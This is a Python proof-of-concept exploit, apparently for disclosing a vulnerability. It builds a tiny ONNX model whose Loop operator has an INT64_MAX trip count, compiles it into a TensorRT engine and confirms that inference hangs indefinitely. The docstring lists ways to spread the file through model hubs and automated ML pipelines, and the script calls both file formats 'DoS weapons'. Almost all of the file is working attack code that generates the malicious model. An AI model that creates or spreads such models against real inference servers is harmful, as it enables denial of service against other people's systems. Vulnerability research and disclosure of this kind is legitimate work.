File size: 8,887 Bytes
2fc3065
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
"""
VULN-003 PoC: TensorRT Denial of Service via ONNX Loop with INT64_MAX Iterations

A crafted ONNX model (338 bytes) containing a Loop operator with max_trip_count
set to INT64_MAX (9,223,372,036,854,775,807) compiles into a valid TensorRT
engine (20,252 bytes) that hangs indefinitely during inference.

Attack vectors:
1. ONNX model on model hub -> victim compiles to engine -> inference hangs
2. Pre-compiled engine file on model hub -> victim loads -> inference hangs
3. Automated ML pipeline ingests malicious model -> entire pipeline stalls

Impact:
- Permanent denial of service for TensorRT inference servers
- No timeout mechanism in execute_async_v3() — hangs until process is killed
- Tiny file size (338 bytes ONNX / 20KB engine) makes distribution trivial
- Affects Triton Inference Server, TensorRT-LLM, any TRT-based pipeline
"""
import os
import sys
import time
import subprocess
import numpy as np
import onnx
from onnx import helper, TensorProto, numpy_helper

# Directory containing this script; main() writes the generated .onnx and
# .engine files here.
POC_DIR = os.path.dirname(os.path.abspath(__file__))


def create_loop_dos_model():
    """Build the minimal ONNX model whose Loop has a trip count of INT64_MAX.

    The main graph feeds a float ``[1, 4]`` tensor named ``input`` through a
    single ``Loop`` node and exposes the result as ``output``.  The loop body
    applies ``Relu`` to the carried tensor and forwards the loop condition
    unchanged through ``Identity``; the initial condition is ``True``, so only
    the trip count bounds the loop.

    Returns:
        The ONNX model, using opset 13 with ``ir_version`` forced to 7.
    """
    int64_max = 0x7FFFFFFFFFFFFFFF  # 9,223,372,036,854,775,807

    def scalar_info(name, elem_type):
        # Rank-0 value info (iteration counter / condition flags).
        return helper.make_tensor_value_info(name, elem_type, [])

    def tensor_info(name):
        # Every data tensor in this model is float32 with shape [1, 4].
        return helper.make_tensor_value_info(name, TensorProto.FLOAT, [1, 4])

    # Loop body: trivial computation plus a pass-through condition.
    body_nodes = [
        helper.make_node('Relu', ['x_in'], ['x_out']),
        helper.make_node('Identity', ['cond_in'], ['cond_out']),
    ]
    body_inputs = [
        scalar_info('i', TensorProto.INT64),
        scalar_info('cond_in', TensorProto.BOOL),
        tensor_info('x_in'),
    ]
    body_outputs = [
        scalar_info('cond_out', TensorProto.BOOL),
        tensor_info('x_out'),
    ]
    loop_body = helper.make_graph(
        body_nodes, 'loop_body', body_inputs, body_outputs
    )

    # Constants consumed by the Loop node: trip count and initial condition.
    initializers = [
        numpy_helper.from_array(
            np.array(int64_max, dtype=np.int64), 'max_trip'
        ),
        numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init'),
    ]

    loop_node = helper.make_node(
        'Loop', ['max_trip', 'cond_init', 'input'], ['output'],
        body=loop_body
    )

    # Main graph: input -> Loop -> output.
    main_graph = helper.make_graph(
        [loop_node], 'loop_dos',
        [tensor_info('input')], [tensor_info('output')],
        initializers
    )
    dos_model = helper.make_model(
        main_graph, opset_imports=[helper.make_opsetid('', 13)]
    )
    dos_model.ir_version = 7
    return dos_model


def build_engine(model_path, engine_path):
    """Parse an ONNX file with TensorRT and write the serialized engine to disk.

    Args:
        model_path: Path of the ONNX model to parse.
        engine_path: Destination path for the serialized engine bytes.

    Returns:
        True when the engine was built and written; False when parsing or
        building failed (the reason is printed to stdout).
    """
    import tensorrt as trt

    trt_logger = trt.Logger(trt.Logger.WARNING)
    trt_builder = trt.Builder(trt_logger)
    explicit_batch = 1 << int(trt.NetworkDefinitionCreationFlag.EXPLICIT_BATCH)
    net = trt_builder.create_network(explicit_batch)
    onnx_parser = trt.OnnxParser(net, trt_logger)

    parsed_ok = onnx_parser.parse_from_file(model_path)
    if not parsed_ok:
        # Dump every parser error before giving up.
        for err_idx in range(onnx_parser.num_errors):
            print(f"  Parse error: {onnx_parser.get_error(err_idx)}")
        return False

    build_config = trt_builder.create_builder_config()
    workspace_bytes = 1 << 24  # 16 MiB workspace pool limit
    build_config.set_memory_pool_limit(
        trt.MemoryPoolType.WORKSPACE, workspace_bytes
    )

    plan = trt_builder.build_serialized_network(net, build_config)
    if plan:
        with open(engine_path, 'wb') as engine_file:
            engine_file.write(bytes(plan))
        return True

    print("  Build failed")
    return False


def test_inference_subprocess(engine_path, timeout=30):
    """Run one inference in a child interpreter and report whether it timed out.

    The child deserializes the engine, binds ``input``/``output`` to CUDA
    tensors allocated with torch, calls ``execute_async_v3`` and synchronizes
    the stream.  Running it in a separate process lets the parent enforce a
    timeout on a call that may never return.

    Args:
        engine_path: Path of the serialized TensorRT engine to load.
        timeout: Seconds to wait for the child before treating it as hung.

    Returns:
        Tuple ``(hung, elapsed, output, returncode)``:
        ``hung`` is True when the child exceeded ``timeout``; ``elapsed`` is
        the wall time in seconds measured by the parent; ``output`` is the
        child's stripped stdout (``"TIMEOUT"`` when hung, and with the last
        stderr line appended when the child exited non-zero); ``returncode``
        is the child's exit status, or -1 when hung.
    """
    # The child script is a constant.  The engine path is handed over as
    # argv[1] instead of being pasted into the source, so quotes or other
    # special characters in the path cannot corrupt the generated code.
    script = '''
import tensorrt as trt, numpy as np, torch, time, sys

with open(sys.argv[1], "rb") as f:
    data = f.read()

logger = trt.Logger(trt.Logger.ERROR)
runtime = trt.Runtime(logger)
engine = runtime.deserialize_cuda_engine(data)
if not engine:
    print("DESER_FAIL")
    sys.exit(1)

context = engine.create_execution_context()
device = torch.device("cuda:0")
inp = torch.randn(1, 4, device=device)
out = torch.empty(1, 4, device=device)
context.set_tensor_address("input", inp.data_ptr())
context.set_tensor_address("output", out.data_ptr())

stream = torch.cuda.current_stream()
print("INFERENCE_STARTED")
sys.stdout.flush()
start = time.time()
context.execute_async_v3(stream.cuda_stream)
stream.synchronize()
elapsed = time.time() - start
print(f"INFERENCE_DONE time={elapsed:.1f}s")
'''
    # Monotonic clock: the measured duration must not be affected by
    # system clock adjustments while the child is running.
    start = time.monotonic()
    try:
        r = subprocess.run(
            [sys.executable, "-c", script, str(engine_path)],
            capture_output=True, text=True, timeout=timeout
        )
    except subprocess.TimeoutExpired:
        return True, time.monotonic() - start, "TIMEOUT", -1

    elapsed = time.monotonic() - start
    output = r.stdout.strip()
    stderr_text = r.stderr.strip()
    if r.returncode != 0 and stderr_text:
        # Surface the failure reason (e.g. an ImportError) instead of
        # silently discarding the child's stderr.
        last_line = stderr_text.splitlines()[-1]
        output = f"{output} [stderr: {last_line}]".strip()
    return False, elapsed, output, r.returncode


def _make_bounded_loop_model(trip_count):
    """Return an ONNX Loop model (Relu body) that runs ``trip_count`` times."""
    def scalar_info(name, elem_type):
        return helper.make_tensor_value_info(name, elem_type, [])

    def tensor_info(name):
        return helper.make_tensor_value_info(name, TensorProto.FLOAT, [1, 4])

    body = helper.make_graph(
        [
            helper.make_node('Relu', ['x_in'], ['x_out']),
            helper.make_node('Identity', ['cond_in'], ['cond_out']),
        ],
        'body',
        [
            scalar_info('i', TensorProto.INT64),
            scalar_info('cond_in', TensorProto.BOOL),
            tensor_info('x_in'),
        ],
        [scalar_info('cond_out', TensorProto.BOOL), tensor_info('x_out')],
    )
    trip = numpy_helper.from_array(
        np.array(trip_count, dtype=np.int64), 'max_trip'
    )
    cond = numpy_helper.from_array(np.array(True, dtype=bool), 'cond_init')
    loop = helper.make_node(
        'Loop', ['max_trip', 'cond_init', 'input'], ['output'], body=body
    )
    graph = helper.make_graph(
        [loop], 'normal',
        [tensor_info('input')], [tensor_info('output')],
        [trip, cond],
    )
    model = helper.make_model(
        graph, opset_imports=[helper.make_opsetid('', 13)]
    )
    model.ir_version = 7
    return model


def main():
    """Run the PoC end to end and print a report.

    Steps:
      1. Write the INT64_MAX Loop model to ``dos_loop.onnx`` in ``POC_DIR``.
      2. Build ``dos_loop.engine`` from it; exit with status 1 on failure.
      3. Build and run a 10-iteration baseline model for comparison; its
         temporary files are removed even if this step raises.
      4. Run the DoS engine in a subprocess with a timeout.

    The summary reflects the observed outcome: the hang is reported as
    confirmed only when the subprocess actually hit the timeout.
    """
    banner = "=" * 70
    baseline_timeout = 15
    dos_timeout = 30

    print(banner)
    print("VULN-003: TensorRT Inference DoS via ONNX Loop(INT64_MAX)")
    print(banner)

    # Step 1: Create malicious ONNX model
    model = create_loop_dos_model()
    onnx_path = os.path.join(POC_DIR, "dos_loop.onnx")
    with open(onnx_path, 'wb') as f:
        f.write(model.SerializeToString())

    onnx_size = os.path.getsize(onnx_path)
    print(f"\n[1] Malicious ONNX model: {onnx_path}")
    print(f"    Size: {onnx_size} bytes")
    print(f"    Loop max_trip_count: {0x7FFFFFFFFFFFFFFF:,} (INT64_MAX)")
    print("    Loop body: single Relu operation")

    # Step 2: Build TensorRT engine
    engine_path = os.path.join(POC_DIR, "dos_loop.engine")
    print("\n[2] Building TensorRT engine...")
    if not build_engine(onnx_path, engine_path):
        print("    ERROR: Engine build failed")
        sys.exit(1)

    engine_size = os.path.getsize(engine_path)
    print(f"    Engine: {engine_path}")
    print(f"    Size: {engine_size} bytes")
    print("    Build completed normally — no error, no warning")

    # Step 3: Baseline — normal model inference (10 iterations)
    print("\n[3] Baseline: Normal model inference")
    baseline_onnx = os.path.join(POC_DIR, "normal_loop.onnx")
    baseline_engine = os.path.join(POC_DIR, "normal_loop.engine")
    try:
        with open(baseline_onnx, 'wb') as f:
            f.write(_make_bounded_loop_model(10).SerializeToString())

        # Only run the baseline when its engine actually exists; otherwise
        # the child would fail on a missing file with a confusing result.
        if build_engine(baseline_onnx, baseline_engine):
            _, elapsed, out, _ = test_inference_subprocess(
                baseline_engine, timeout=baseline_timeout
            )
            print(f"    Normal model (10 iterations): {out} ({elapsed:.1f}s)")
        else:
            print("    WARNING: Baseline engine build failed; baseline skipped")
    finally:
        # Cleanup temp files, even when the baseline step raised.
        for temp_path in (baseline_onnx, baseline_engine):
            try:
                os.remove(temp_path)
            except FileNotFoundError:
                pass

    # Step 4: DoS inference
    print(
        f"\n[4] DoS inference (will hang for {dos_timeout} seconds "
        "then be killed)"
    )
    hung, elapsed, out, rc = test_inference_subprocess(
        engine_path, timeout=dos_timeout
    )
    if hung:
        print(f"    TIMEOUT after {elapsed:.1f}s — INFERENCE IS HANGING")
        print("    [!!!] DoS CONFIRMED")
    else:
        print(f"    Inference completed: {out} ({elapsed:.1f}s)")

    # Summary — only claim the hang when it was actually observed.
    print(f"\n{banner}")
    print("VULNERABILITY SUMMARY")
    print(banner)
    if hung:
        print("[!!!] TensorRT inference hangs indefinitely on Loop(INT64_MAX)")
        print(f"[!!!] ONNX model size: {onnx_size} bytes")
        print(f"[!!!] Engine file size: {engine_size} bytes")
        print("[!!!] Both formats can be used as DoS weapons")
        print("[!!!] No timeout in execute_async_v3() — runs until process killed")
        print("[!!!] Loop iterations: 9,223,372,036,854,775,807 (INT64_MAX)")
        print("[!!!] Even at 1 billion iterations/sec, would take 292 YEARS")
    else:
        print("[---] Hang NOT reproduced: inference returned before the timeout")
        print(f"[---] Child exit code: {rc}, output: {out!r}")
        print(f"[---] ONNX model size: {onnx_size} bytes")
        print(f"[---] Engine file size: {engine_size} bytes")


# Run the PoC only when this file is executed as a script, not on import.
if __name__ == "__main__":
    main()